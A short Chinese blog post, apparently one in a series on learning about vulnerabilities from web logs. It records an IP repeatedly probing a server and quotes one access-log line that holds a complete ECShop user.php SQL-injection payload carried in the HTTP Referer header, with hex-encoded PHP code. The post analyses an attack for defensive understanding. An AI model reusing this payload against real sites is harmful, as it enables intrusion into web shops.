2019年5月24日 星期五

從 Web Log 學習系統漏洞 42

web log中出現了有趣的東西, 這個 IP 嘗試600多次的 phpmyadmin 漏洞攻擊, 其中包含這一段, 估狗了一下, 似乎是一個叫 ECShop 網路商城系統的漏洞攻擊, 使用 SQL 注入方式攻擊 user.php 的 display 函數, 通常攻擊碼都會放在對網頁的需求中(如同這段攻擊的POST後), 不過這個卻是放在HTTP需求標頭裡的Referrers中(403 217之後)

61.153.205.58 - - [24/May/2019:15:37:45 +0800] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 403 217 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\"id\";s:3:\"'/*\";s:3:\"num\";s:141:\"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\";s:4:\"name\";s:3:\"ads\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"

沒有留言:

張貼留言